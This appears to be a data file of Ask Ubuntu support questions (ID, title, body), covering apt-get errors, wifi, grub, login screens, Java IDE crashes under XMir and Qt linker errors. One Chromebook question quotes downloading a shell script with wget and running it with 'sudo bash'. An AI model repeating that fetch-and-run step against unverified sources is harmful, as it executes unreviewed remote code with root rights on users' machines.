in order to use this headset ) .
349769	apt-get update error failed to fetch	i have a problem with apt-get update . when i try to use it , i have `` failed to fetch '' problem . w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/partner/i18n/translation-en can not initiate the connection to archive.canonical.com:80 ( 91.189.92.191 ) . - connect ( 101 : network is unreachable ) [ ip : 91.189.92.191 80 ] w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/precise/main/i18n/translation-en_us can not initiate the connection to extras.ubuntu.com:80 ( 91.189.92.152 ) . - connect ( 101 : network is unreachable ) i tried to choose the best server and had a `` no suitable download server was found '' . internet on .
349770	why mouse always move to left-top corner of screen	my ubuntu12.04 installed in notebook and upgrade from software-center today . after some time , i found the mouse always stay on left-top of screen . i try to move mouse to other position , but it always move to left-top quickly that i ca n't operate the system . and it is the same problem that use notebook-mouse or use usb-mouse . anyone encounter my problem ? have solution ?
349772	pidgin is getting hanged	yesterday , when i was trying answer a question on tor i installed it on my machine and at that point , it displayed a message saying a pidgin-xxx is not needed any more and hence run sudo apt-get autoclean . i mentioned it as xxx because i do n't remember what that package is . i have shutdown my pc and restarted in the evening , pidgin started to hang . not sure of the problem , i tried installing all the pidgin plugins with sudo apt-get install pidgin* . this installed whole bunch of plugins . even then it is in the same state . can anyone let me know what i have uninstalled so i can reinstall or what need to be done to fix this issue . i would like to update here saying that the pidgin gets hanged only when i login into my yahoo account . when i login into skype , it works fine for me . i just realized the same .
349773	how can i encrypt all data in /var/www so no one except root can access it ?	i have a situation that i sell my product on an virtual machine with ubuntu installed on it and it has a lamp on it and i do not want any one to be able to copy or access my code . of course i have a very secure password for the root , but this is not an issue . bad guys mound a cd with a live linux and boot up on my vm so they work around all the passwords and gain access to my code . that is the reason i would like to have all my files and data in the www folder to be encrypted .
349777	apt-get autoremove does n't work the way it 's advertised	i wan na ask about the abnormal behaviour of the autoremove function in apt-get , which `` should '' remove the remaining automatically installed packages , that came as a dependency of the actually ( manually ) installed package ( s ) . but it is not the case . the following output shows an example of this . trisquel @ trisquel : ~ $ sudo apt-get -- no-install-recommends install equivs reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : binutils debhelper dh-apparmor dpkg-dev fakeroot gettext html2text intltool-debian libdpkg-perl libgettextpo0 libunistring0 make po-debconf suggested packages : binutils-doc dh-make debian-keyring gettext-doc make-doc libmail-box-perl recommended packages : gcc c-compiler build-essential libalgorithm-merge-perl libmail-sendmail-perl the following new packages will be installed : binutils debhelper dh-apparmor dpkg-dev equivs fakeroot gettext html2text intltool-debian libdpkg-perl libgettextpo0 libunistring0 make po-debconf 0 upgraded , 14 newly installed , 0 to remove and 299 not upgraded . need to get 6,841 kb of archives . after this operation , 17.6 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //es.archive.trisquel.info/trisquel/ toutatis/main libunistring0 i386 0.9.3-5 [ 432 kb ] get:2 http : //es.archive.trisquel.info/trisquel/ toutatis/main libgettextpo0 i386 0.18.1.1-5ubuntu3 [ 118 kb ] get:3 http : //es.archive.trisquel.info/trisquel/ toutatis-updates/main binutils i386 2.22-6ubuntu1.1 [ 2,387 kb ] get:4 http : //es.archive.trisquel.info/trisquel/ toutatis/main libdpkg-perl all 1.16.1.2ubuntu7.1+6.0trisquel2 [ 653 kb ] get:5 http : //es.archive.trisquel.info/trisquel/ toutatis-updates/main make i386 3.81-8.1ubuntu1.1 [ 116 kb ] get:6 http : //es.archive.trisquel.info/trisquel/ toutatis/main dpkg-dev all 1.16.1.2ubuntu7.1+6.0trisquel2 [ 939 kb ] get:7 http : //es.archive.trisquel.info/trisquel/ toutatis/main html2text i386 1.3.2a-15 [ 101 kb ] get:8 http : //es.archive.trisquel.info/trisquel/ toutatis/main gettext i386 0.18.1.1-5ubuntu3 [ 1,122 kb ] get:9 http : //es.archive.trisquel.info/trisquel/ toutatis/main intltool-debian all 0.35.0+20060710.1 [ 31.6 kb ] get:10 http : //es.archive.trisquel.info/trisquel/ toutatis/main po-debconf all 1.0.16+nmu2ubuntu1 [ 210 kb ] get:11 http : //es.archive.trisquel.info/trisquel/ toutatis-updates/main dh-apparmor all 2.7.102-0ubuntu3.9 [ 8,950 b ] get:12 http : //es.archive.trisquel.info/trisquel/ toutatis/main debhelper all 9.20120115ubuntu3 [ 616 kb ] get:13 http : //es.archive.trisquel.info/trisquel/ toutatis/main fakeroot i386 1.18.2-1 [ 87.9 kb ] get:14 http : //es.archive.trisquel.info/trisquel/ toutatis/main equivs all 2.0.9 [ 18.5 kb ] fetched 6,841 kb in 2s ( 2,734 kb/s ) selecting previously unselected package libunistring0 . ( reading database ... 131645 files and directories currently installed . ) unpacking libunistring0 ( from ... /libunistring0_0.9.3-5_i386.deb ) ... selecting previously unselected package libgettextpo0 . unpacking libgettextpo0 ( from ... /libgettextpo0_0.18.1.1-5ubuntu3_i386.deb ) ... selecting previously unselected package binutils . unpacking binutils ( from ... /binutils_2.22-6ubuntu1.1_i386.deb ) ... selecting previously unselected package libdpkg-perl . unpacking libdpkg-perl ( from ... /libdpkg-perl_1.16.1.2ubuntu7.1+6.0trisquel2_all.deb ) ... selecting previously unselected package make . unpacking make ( from ... /make_3.81-8.1ubuntu1.1_i386.deb ) ... selecting previously unselected package dpkg-dev . unpacking dpkg-dev ( from ... /dpkg-dev_1.16.1.2ubuntu7.1+6.0trisquel2_all.deb ) ... selecting previously unselected package html2text . unpacking html2text ( from ... /html2text_1.3.2a-15_i386.deb ) ... selecting previously unselected package gettext . unpacking gettext ( from ... /gettext_0.18.1.1-5ubuntu3_i386.deb ) ... selecting previously unselected package intltool-debian . unpacking intltool-debian ( from ... /intltool-debian_0.35.0+20060710.1_all.deb ) ... selecting previously unselected package po-debconf . unpacking po-debconf ( from ... /po-debconf_1.0.16+nmu2ubuntu1_all.deb ) ... selecting previously unselected package dh-apparmor . unpacking dh-apparmor ( from ... /dh-apparmor_2.7.102-0ubuntu3.9_all.deb ) ... selecting previously unselected package debhelper . unpacking debhelper ( from ... /debhelper_9.20120115ubuntu3_all.deb ) ... selecting previously unselected package fakeroot . unpacking fakeroot ( from ... /fakeroot_1.18.2-1_i386.deb ) ... selecting previously unselected package equivs . unpacking equivs ( from ... /archives/equivs_2.0.9_all.deb ) ... processing triggers for man-db ... processing triggers for install-info ... processing triggers for doc-base ... processing 1 added doc-base file ... registering documents with scrollkeeper ... setting up libunistring0 ( 0.9.3-5 ) ... setting up libgettextpo0 ( 0.18.1.1-5ubuntu3 ) ... setting up binutils ( 2.22-6ubuntu1.1 ) ... setting up libdpkg-perl ( 1.16.1.2ubuntu7.1+6.0trisquel2 ) ... setting up make ( 3.81-8.1ubuntu1.1 ) ... setting up dpkg-dev ( 1.16.1.2ubuntu7.1+6.0trisquel2 ) ... setting up html2text ( 1.3.2a-15 ) ... setting up gettext ( 0.18.1.1-5ubuntu3 ) ... setting up intltool-debian ( 0.35.0+20060710.1 ) ... setting up po-debconf ( 1.0.16+nmu2ubuntu1 ) ... setting up dh-apparmor ( 2.7.102-0ubuntu3.9 ) ... setting up debhelper ( 9.20120115ubuntu3 ) ... setting up fakeroot ( 1.18.2-1 ) ... update-alternatives : using /usr/bin/fakeroot-sysv to provide /usr/bin/fakeroot ( fakeroot ) in auto mode . setting up equivs ( 2.0.9 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place trisquel @ trisquel : ~ $ sudo apt-get autoremove equivs reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : equivs 0 upgraded , 0 newly installed , 1 to remove and 299 not upgraded . after this operation , 87.0 kb disk space will be freed . do you want to continue [ y/n ] ? n abort . trisquel @ trisquel : ~ $ sudo apt-get remove equivs reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : equivs 0 upgraded , 0 newly installed , 1 to remove and 299 not upgraded . after this operation , 87.0 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 132810 files and directories currently installed . ) removing equivs ... processing triggers for man-db ... trisquel @ trisquel : ~ $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 299 not upgraded . trisquel @ trisquel : ~ $ this was tested on `` trisquel 6.0 32-bit '' , `` ubuntu 12.04.3 32-bit '' , and `` debian 7.0 gnome 32-bit '' . all of them was unable to fullfill the task of removing the automatically installed packages/dependencies . my question is , where is the problem ?
349779	ca n't install ubuntu server with screen problem	i want to install ubuntu server on notebook acer aspire 4750g ( vga intel + nvidia ) . but when boot via dvd or usb drive back across the screen as a line . can not read the text . the picture attached . try to include the version 12.10 lts and 13.04 were the same problems . would need to fix it better . pic link
349780	grub2 other input methods ?	i use a logitech g510 keyboard which does not work during boot until the so ( whatever it is ) is loaded . this were n't a problem because i only need from time to time to enter de bios , and in that case i plug another simpler keyboard . but now that i need to choose the entry boot every time i turn on the computer , so i need another input method to chose an option . in grub2 , is there any other input method ( mouse , bootable usb , etc . ) to chose the entry boot ? related : ubuntu 13.04 , raring ringtail grub version : grub-install ( grub ) 2.00-13ubuntu3 bios legacy usb keyboard support is enabled attempt 1 : installed burg with default configurations - > keyboard does not work configuring burg with grub_terminal_input=usb_keyboard - > causes reboot adding `` insmod usb '' & `` insmod usb_keyboard '' - > causes reboot edit : attempt 1 and bios checking .
349781	how to update aria2 to latest version 1.18 ?	my ubuntu version is 12.04 lts and my installed aria2 version is 1.13 . today i checked in aria2 website that the latest version is 1.18 . so can i update my aria2 to it 's latest version or not ? how can i do it ?
349783	ubuntu dos n't connect to wpa personal , but does wpa enterprise	i 've used linux a bit , but i 'm still a bit new . i 've always had this problem , i 'm running xubuntu , but the last distro that i had was also xfce and had this problem too . basically , i can connect to my school wi-fi which is an enterprise setup ( with cert and everything ) . however , when i come home and access one of the three networks i have access to it does n't work . what happens is that i 'll click it , the wheel will spin for maybe half a minute then say `` disconnected '' . ( i should also say that the first time it did ask for my password which was correct , i have re-entered it into the system several times too manually ) i can wire the connection , but this is obviously a temporary solution to a permiant problem ( tstpp ) . help is appreciated .
349787	installing fresh ubuntu	i have dual booted ubuntu with windows 7 through wubi in a new partition , then removed windows 7 and installed windows 8 . now , i want to have a fresh copy of ubuntu 12.04lts . can i just run wubi again and ask it to install ubuntu in the same partition ? does this method have any drawbacks ? i have heard many people saying that if we uninstall ubuntu , windows will also become unusable . how can i avoid it ?
349791	cost free vnc and remote offsite monitoring	i 'm looking to remotely use and fix my girlfriends computer 300 miles away and after that manage and watch it . she has over 10,000 updates and does not know how to use her computer . can some one please point me in the right direction with directions on how to control a system 300 miles away . then after that remotely able to update it with out taking hold of her hole system and see when her computer is kaput . i never relay used the command line besides ( sudo-apt get ... ) to install software . i have never used a vnc/ or system management software before either . but i 'm willing to learn and am comfortable learning . i have only had linux for a short while , and my girlfriend only had linux for about a year , but she is not an avid computer user and not willing to learn how to manage her system and updates . she has tried and gave up . my system : ubuntu 13.04 her system : 12.04 thank you- tony
349792	how to set screen shots for my deb file in ubuntu software center	i 'm developed an application and also created deb package of that application . when i install this deb file , it was opened in ubuntu software center and installed . but at the time of installation , screen shots was empty in ubuntu software center . what wrong with the creation of deb file or any other possibility was there ?
349795	audacious with shortcuts in keyboard	i am using ubuntu 12.04 and audacious as audio player.i am using a lenovo g460 notebook.it has keys which can play music.they work with amarok . but , i want to make them work with audacious.can anyone help me ?
349797	unable to install updates `` not enought disk space ''	i am unable to install updates . get an error message saying `` not enough free disk space '' when there is plenty of disk space in the pc . i could send the screen shot if an e-mail address is provided . i run 13.04 please help . jay
349798	how do i install ubuntu on samsung chromebook 3 ?	so i followed the instructions that were posted here . everything seems to be going as planned until i got to the last step where i was supposed to `` configure wifi , open the terminal and run the script again . it 'll download a bunch of files then reboot into ubuntu . '' after running the script wget http : //cr-48-ubuntu.googlecode.com/files/arm-chrubuntu-3.sh sudo bash arm-chrubuntu-3.sh for a second time and waiting for all sorts of files to download , my chromebook never rebooted into ubuntu . i tried to open a terminal and typing sudo cgpt add -i 6 -p 5 -s 1 /dev/mmcblk0 and nothing happened , just another empty command line . and i just now set my chromebook back to its normal settings , then switched it back to developer mode and retyped wget http : //cr-48-ubuntu.googlecode.com/files/arm-chrubuntu-3.sh sudo bash arm-chrubuntu-3.sh and it asked me how many gigs i wanted to reserve for ubuntu 5-1 and recommending 0 as the maximum when i choose the number zero ( 0 ) it said error please choose a number , then i typed the letter o and it rebooted my chromebook and repaired the os . after it repaired the os it brought me back to me login for chrome os and i just set up the network connection and opened a terminal logged in as chronos and redid the whole process again and this time it started to download all these files and still after all the downloads my chromebook did n't reboot into ubuntu . what should i do ?
349799	how to check if file in ubuntu one cloud have been changed	i 'm writing ubuntu one app in python that download files . it is working fine , but i want to modify it as if uploaded file changes , it downloads that file in current directory and so on . does anyone have any idea how to do this ? which api should i use .
349801	running netbeans on ubuntu 13.10 with xmir enabled	i have installed one of the latest daily build of saucy salamander . if i enable xmir java swing applications such as netbeans or oracle sql developer just display their splash screen but they do n't display . they do n't seem to freeze , because they are correctly listed in the process list . i am using an intel chipset . more over , even with x fallback jayatana , which in previous ubuntu version worked as expected showing java applications menus in the global menubar , stopped working with both oracle java and open jdk . this is what i see from startup log of oracle sqldeveloper 4 running on openjdk runtime environment ( icedtea 2.3.12 ) ( 7u25-2.3.12-4ubuntu1 ) openjdk 64-bit server vm ( build 23.7-b01 , mixed mode ) : java.lang.runtimeexception : can not load system cursor : copydrop.32x32 at sun.awt.x11.xtoolkit.lazilyloaddesktopproperty ( xtoolkit.java:1515 ) at java.awt.toolkit.getdesktopproperty ( toolkit.java:1804 ) at java.awt.dnd.dragsource.load ( dragsource.java:131 ) at java.awt.dnd.dragsource . ( dragsource.java:147 ) at oracle.ideimpl.explorer.dnd.jtreedraghandler . ( jtreedraghandler.java:56 ) at oracle.dbtools.raptor.navigator.core.navigatorui.settree ( navigatorui.java:148 ) at oracle.dbtools.raptor.navigator.core.navigatorwindow.creategui ( navigatorwindow.java:107 ) at oracle.dbtools.raptor.navigator.core.navigatorwindow.getgui ( navigatorwindow.java:319 ) at oracle.ide.docking.dockablewindow.gethostedcomponent ( dockablewindow.java:238 ) at com.oracle.jdeveloper.nbwindowsystem.nbdockablecontainer.componentopened ( nbdockablecontainer.java:171 ) at org.openide.windows.windowmanager.componentopennotify ( windowmanager.java:307 ) at org.netbeans.core.windows.windowmanagerimpl.notifytopcomponentopened ( windowmanagerimpl.java:1140 ) at org.netbeans.core.windows.central.addmodeopenedtopcomponent ( central.java:798 ) at org.netbeans.core.windows.modeimpl.addopenedtopcomponent ( modeimpl.java:354 ) at org.netbeans.core.windows.persistencehandler.initmodefromconfig ( persistencehandler.java:451 ) at org.netbeans.core.windows.persistencehandler.load ( persistencehandler.java:214 ) at org.netbeans.core.windows.windowsystemimpl.load ( windowsystemimpl.java:81 ) at org.netbeans.core.guirunlevel $ initwinsys.run ( guirunlevel.java:231 ) at java.awt.event.invocationevent.dispatch ( invocationevent.java:251 ) at java.awt.eventqueue.dispatcheventimpl ( eventqueue.java:733 ) at java.awt.eventqueue.access $ 200 ( eventqueue.java:103 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:694 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:692 ) at java.security.accesscontroller.doprivileged ( native method ) at java.security.protectiondomain $ 1.dointersectionprivilege ( protectiondomain.java:76 ) at java.awt.eventqueue.dispatchevent ( eventqueue.java:703 ) at oracle.javatools.internal.ui.eventqueuewrapper._dispatchevent ( eventqueuewrapper.java:169 ) at oracle.javatools.internal.ui.eventqueuewrapper.dispatchevent ( eventqueuewrapper.java:151 ) at java.awt.eventdispatchthread.pumponeeventforfilters ( eventdispatchthread.java:242 ) at java.awt.eventdispatchthread.pumpeventsforfilter ( eventdispatchthread.java:161 ) at java.awt.eventdispatchthread.pumpeventsforhierarchy ( eventdispatchthread.java:150 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:146 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:138 ) at java.awt.eventdispatchthread.run ( eventdispatchthread.java:91 ) caused by : java.awt.awtexception : exception : class java.lang.illegalargumentexception width ( 0 ) and height ( 0 ) must be non-zero occurred while creating cursor copydrop.32x32 at java.awt.cursor.getsystemcustomcursor ( cursor.java:362 ) at sun.awt.x11.xtoolkit.lazilyloaddesktopproperty ( xtoolkit.java:1513 ) ... 33 more failed to load a window java.lang.exceptionininitializererror at oracle.ideimpl.explorer.dnd.jtreedraghandler . ( jtreedraghandler.java:56 ) at oracle.dbtools.raptor.navigator.core.navigatorui.settree ( navigatorui.java:148 ) at oracle.dbtools.raptor.navigator.core.navigatorwindow.creategui ( navigatorwindow.java:107 ) at oracle.dbtools.raptor.navigator.core.navigatorwindow.getgui ( navigatorwindow.java:319 ) at oracle.ide.docking.dockablewindow.gethostedcomponent ( dockablewindow.java:238 ) at com.oracle.jdeveloper.nbwindowsystem.nbdockablecontainer.componentopened ( nbdockablecontainer.java:171 ) at org.openide.windows.windowmanager.componentopennotify ( windowmanager.java:307 ) at org.netbeans.core.windows.windowmanagerimpl.notifytopcomponentopened ( windowmanagerimpl.java:1140 ) at org.netbeans.core.windows.central.addmodeopenedtopcomponent ( central.java:798 ) at org.netbeans.core.windows.modeimpl.addopenedtopcomponent ( modeimpl.java:354 ) at org.netbeans.core.windows.persistencehandler.initmodefromconfig ( persistencehandler.java:451 ) at org.netbeans.core.windows.persistencehandler.load ( persistencehandler.java:214 ) at org.netbeans.core.windows.windowsystemimpl.load ( windowsystemimpl.java:81 ) at org.netbeans.core.guirunlevel $ initwinsys.run ( guirunlevel.java:231 ) at java.awt.event.invocationevent.dispatch ( invocationevent.java:251 ) at java.awt.eventqueue.dispatcheventimpl ( eventqueue.java:733 ) at java.awt.eventqueue.access $ 200 ( eventqueue.java:103 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:694 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:692 ) at java.security.accesscontroller.doprivileged ( native method ) at java.security.protectiondomain $ 1.dointersectionprivilege ( protectiondomain.java:76 ) at java.awt.eventqueue.dispatchevent ( eventqueue.java:703 ) at oracle.javatools.internal.ui.eventqueuewrapper._dispatchevent ( eventqueuewrapper.java:169 ) at oracle.javatools.internal.ui.eventqueuewrapper.dispatchevent ( eventqueuewrapper.java:151 ) at java.awt.eventdispatchthread.pumponeeventforfilters ( eventdispatchthread.java:242 ) at java.awt.eventdispatchthread.pumpeventsforfilter ( eventdispatchthread.java:161 ) at java.awt.eventdispatchthread.pumpeventsforhierarchy ( eventdispatchthread.java:150 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:146 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:138 ) at java.awt.eventdispatchthread.run ( eventdispatchthread.java:91 ) caused by : java.lang.runtimeexception : failed to load system cursor : dnd.cursor.copydrop : can not load system cursor : copydrop.32x32 at java.awt.dnd.dragsource.load ( dragsource.java:135 ) at java.awt.dnd.dragsource . ( dragsource.java:147 ) ... 30 more failed to load a window java.lang.noclassdeffounderror : could not initialize class java.awt.dnd.dragsource at oracle.ideimpl.explorer.dnd.jtreedraghandler . ( jtreedraghandler.java:56 ) at oracle.ideimpl.explorer.basetreeexplorer.createdragsource ( basetreeexplorer.java:1477 ) at oracle.ideimpl.explorer.basetreeexplorer.createdragdropsupportifenabled ( basetreeexplorer.java:1764 ) at oracle.ideimpl.explorer.basetreeexplorer.gettree ( basetreeexplorer.java:1451 ) at oracle.ideimpl.explorer.basetreeexplorer.getjtree ( basetreeexplorer.java:433 ) at oracle.ide.explorer.iconoverlaycoordinator $ nodewatcher . ( iconoverlaycoordinator.java:547 ) at oracle.ide.explorer.iconoverlaycoordinator $ nodewatcher . ( iconoverlaycoordinator.java:530 ) at oracle.ide.explorer.iconoverlaycoordinator.registeroverlayconsumer ( iconoverlaycoordinator.java:229 ) at oracle.ide.explorer.iconoverlaycoordinator.processconsumerchangeevent ( iconoverlaycoordinator.java:209 ) at oracle.ide.explorer.iconoverlaycoordinator.access $ 100 ( iconoverlaycoordinator.java:69 ) at oracle.ide.explorer.iconoverlaycoordinator $ 4.statechanged ( iconoverlaycoordinator.java:187 ) at oracle.ide.explorer.iconoverlaycache.registeroverlayconsumer ( iconoverlaycache.java:93 ) at oracle.ideri.navigator.defaultnavigatorwindow.createtree ( defaultnavigatorwindow.java:1190 ) at oracle.ideri.navigator.defaultnavigatorwindow.getgui ( defaultnavigatorwindow.java:433 ) at oracle.dbtools.raptor.report.navigatorv2.reportnavigatorwindow.init ( reportnavigatorwindow.java:36 ) at oracle.dbtools.raptor.report.navigatorv2.reportnavigatorwindow.getgui ( reportnavigatorwindow.java:64 ) at oracle.ide.docking.dockablewindow.gethostedcomponent ( dockablewindow.java:238 ) at com.oracle.jdeveloper.nbwindowsystem.nbdockablecontainer.componentopened ( nbdockablecontainer.java:171 ) at org.openide.windows.windowmanager.componentopennotify ( windowmanager.java:307 ) at org.netbeans.core.windows.windowmanagerimpl.notifytopcomponentopened ( windowmanagerimpl.java:1140 ) at org.netbeans.core.windows.central.addmodeopenedtopcomponent ( central.java:798 ) at org.netbeans.core.windows.modeimpl.addopenedtopcomponent ( modeimpl.java:354 ) at org.netbeans.core.windows.persistencehandler.initmodefromconfig ( persistencehandler.java:451 ) at org.netbeans.core.windows.persistencehandler.load ( persistencehandler.java:214 ) at org.netbeans.core.windows.windowsystemimpl.load ( windowsystemimpl.java:81 ) at org.netbeans.core.guirunlevel $ initwinsys.run ( guirunlevel.java:231 ) at java.awt.event.invocationevent.dispatch ( invocationevent.java:251 ) at java.awt.eventqueue.dispatcheventimpl ( eventqueue.java:733 ) at java.awt.eventqueue.access $ 200 ( eventqueue.java:103 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:694 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:692 ) at java.security.accesscontroller.doprivileged ( native method ) at java.security.protectiondomain $ 1.dointersectionprivilege ( protectiondomain.java:76 ) at java.awt.eventqueue.dispatchevent ( eventqueue.java:703 ) at oracle.javatools.internal.ui.eventqueuewrapper._dispatchevent ( eventqueuewrapper.java:169 ) at oracle.javatools.internal.ui.eventqueuewrapper.dispatchevent ( eventqueuewrapper.java:151 ) at java.awt.eventdispatchthread.pumponeeventforfilters ( eventdispatchthread.java:242 ) at java.awt.eventdispatchthread.pumpeventsforfilter ( eventdispatchthread.java:161 ) at java.awt.eventdispatchthread.pumpeventsforhierarchy ( eventdispatchthread.java:150 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:146 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:138 ) at java.awt.eventdispatchthread.run ( eventdispatchthread.java:91 ) any suggestion . thanks in advance andrea
349802	is it recommended to create a cgroup per process ?	i would like to write a simple monitoring application without using systemd/upstart . is it recommended to use a cgroup per daemon that i start ? if not what are the issues ! !
349804	no login screen after upgrade to 13.04	i upgraded ubuntu 12.10 to 13.04 . and now after boot no login screen appears , instead the screen just shows a kind of static noise . however booting and logging in with the recovery mode works without any problem . the pc is running with a radeon mobility 4570 , ubuntu displays vesa m92 as driver . i find it strange that i have no problems with the live cd of ubuntu 13.04 , the issue only appeared after booting it from the hdd . ( in a related question somebody suggests to edit the unity-greeter.conf file , but it seems this file does not exist on my system . )
349805	no login dialog in kubuntu after instaling fglrx and reinstallation of xong did not help	in kubuntu 13.04 64 bit , fglrx did not install , so i tried to reinstall xserver as follows : sudo apt-get install -- reinstall xserver-xorg-core libgl1-mesa-glx : i386 libgl1-mesa-dri : i386 libgl1-mesa-glx : amd64 libgl1-mesa-dri : amd64 sudo dpkg-reinstall xserver-xorg-core sudo reboot after that , on boot only a picture with `` kubuntu '' appears and freezes , sometimes no reaction to ctrl+alt+del . purging and reinstalling xserver-xorg did not help .
349806	is it possible to instal build-essential pack offline	i have an old laptop with the pentium-m running the unbuntu 11.10 . the problem is that the laptop can not be connected to the internet to execute the : sudo apt-get install build-essential is there any possibility the get this pack offline ? terminal response to the sudo apt-get install buil-essential line : user @ ubuntu : ~ $ sudo apt-get install build-essential reading package lists ... done building dependency tree reading state information ... done e : unable to locate package build-essential i need the compilers to work for the qt-creator 5.1 , but the system does n't find any compiler even though by running the dpgk -- list | grep compiler i have the following response : ii gcc 4:4.6.1-2unbuntu5 gnu c compiler ii gcc-4.6 4.6.1-9unbuntu3 gnu c compiler ii libprotoc7 2.4.0a-2unbuntu2 protocol buffers compiler libary ii protobuf-compiler 2.4.0a-2unbuntu2 compiler for protocol buffer definition files
349807	wi-fi device connected , but no signals detected ?	i plugged in my usb wi-fi adapter . i then unplugged the ethernet cable . i expected to see a list of networks i could connect with . i saw no such networks in the connection center on the top right of the screen . i figured that my usb wi-fi device was not working . lsub shows my device is connected . however when i click on the network center , i do n't see any wireless networks . the only entries listed in the network manager are `` wired '' and `` proxy '' . what should i do ? i think the wi-fi is n't installed is all . i am running ubuntu 13.04 on my desktop . > lsusb bus 002 device 003 : id 13b1:0039 linksys ae1200 802.11bgn wireless adapter [ broadcom bcm43235 ] > lsmod module size used by nls_utf8 12493 1 udf 83786 1 parport_pc 27504 0 ppdev 12817 0 rfcomm 37420 0 bnep 17669 2 bluetooth 202109 10 bnep , rfcomm ext2 63166 1 snd_hda_codec_hdmi 36186 1 nvidia 8582455 65 snd_hda_codec_realtek 63791 1 kvm_amd 50336 0 kvm 376505 1 kvm_amd mxm_wmi 12893 0 video 18894 0 wmi 18590 1 mxm_wmi snd_hda_intel 38307 6 snd_hda_codec 117617 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 13272 1 snd_hda_codec snd_pcm 80890 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 14230 2 snd_pcm , snd_hda_intel snd_seq_midi 13132 0 snd_seq_midi_event 14475 1 snd_seq_midi snd_rawmidi 25114 1 snd_seq_midi snd_seq 51280 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14137 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 24411 2 snd_pcm , snd_seq asus_atk0110 17390 0 snd 56485 22 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device i2c_nforce2 12876 0 k10temp 12958 0 mac_hid 13037 0 lp 13299 0 psmouse 81065 0 microcode 18286 0 parport 40753 3 lp , ppdev , parport_pc soundcore 12600 1 snd serio_raw 13031 0 hid_generic 12484 0 usbhid 41805 0 hid 82666 2 hid_generic , usbhid pata_acpi 12886 0 firewire_ohci 35292 0 firewire_core 61718 1 firewire_ohci crc_itu_t 12627 2 udf , firewire_core forcedeth 61777 0 pata_amd 13761 0 ahci 25507 3 libahci 26108 1 ahci dmesg output : this is really long , it takes up my whole terminal page , still want it ? i do n't know what i 'm looking for from it . > ifconfig -a eth0 link encap : ethernet hwaddr 00:24:8c:79:5e:11 inet addr:192.168.1.218 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : 2602:304 : cd4a:87b9:224:8cff : fe79:5e11/64 scope : global inet6 addr : fe80 : :224:8cff : fe79:5e11/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4964074 errors:0 dropped:0 overruns:0 frame:0 tx packets:1814118 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:7124764702 ( 7.1 gb ) tx bytes:148838056 ( 148.8 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:267772 errors:0 dropped:0 overruns:0 frame:0 tx packets:267772 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:27839379 ( 27.8 mb ) tx bytes:27839379 ( 27.8 mb ) thanks for all the help ! much appreciated .
349808	is it possible to connect ubuntu phone to the keyboard ?	i wonder to know if there will be an opportunity to connect some keyboards ( like for tablets ) directly to smartphone or perhaps through the dock-station and use it . or it even could be keyboard-dockstation with external battery ...
349809	qt4 creator errors	ca n't find anything that will solve this : /usr/bin/ld : can not find -lxslt /usr/bin/ld : can not find -lgstapp-0.10 /usr/bin/ld : can not find -lgstinterfaces-0.10 /usr/bin/ld : can not find -lgstpbutils-0.10 /usr/bin/ld : can not find -lgstvideo-0.10 /usr/bin/ld : can not find -lgstbase-0.10 /usr/bin/ld : can not find -lgstreamer-0.10 /usr/bin/ld : can not find -lxml2 collect2 : error : ld returned 1 exit status make : *** [ educ ] error 1 09:39:15 : the process `` /usr/bin/make '' exited with code 2 . error while building/deploying project educ ( kit : desktop ) when executing step 'make' 09:39:15 : elapsed time : 00:01 . could somebody help me ? sudo apt-get install libxslt1-dev libxslt1.1 for -lxslt for the others , it would be : sudo apt-get install libgstreamer-plugins-base0.10-dev libgstreamer-plugins-base1.0-dev libgstreamer0.10-dev libgstreamer1.0-dev
349810	how to restore top level menu on panel in ubuntu 13.04	i tried to install `` macbuntu '' which is not compatible with 13.04 and i do n't know why ? but i used force option on command line nothing changed so i uninstalled `` macbuntu '' . now the problem is that the top menu just disappeared . for example when i 'm using sublime_text or chrome there is no menu option ( file , edit , etc.. ) on the panel . i tried using unity -- reset-icons option but it did n't work . any help will be appreciated .
349811	ubuntu laptop as usb speaker	i want to know if it is possible to use my ubuntu13.04 laptop as a usb speaker . i want to connect a phone ( otg capable ) that allows usb audio to laptop and play music so that it comes out of laptop speakers . more generally , is it possible for a usb host to act as a usb peripheral ? thanks .
349812	how to tell dash to look for music on other ntfs partitions ?	all my songs and videos are present in ntfs partition , as a result whenever i search for music in dash it results nothing . so how do i tell dash to look for content in specific folder rather than looking only in home folder .
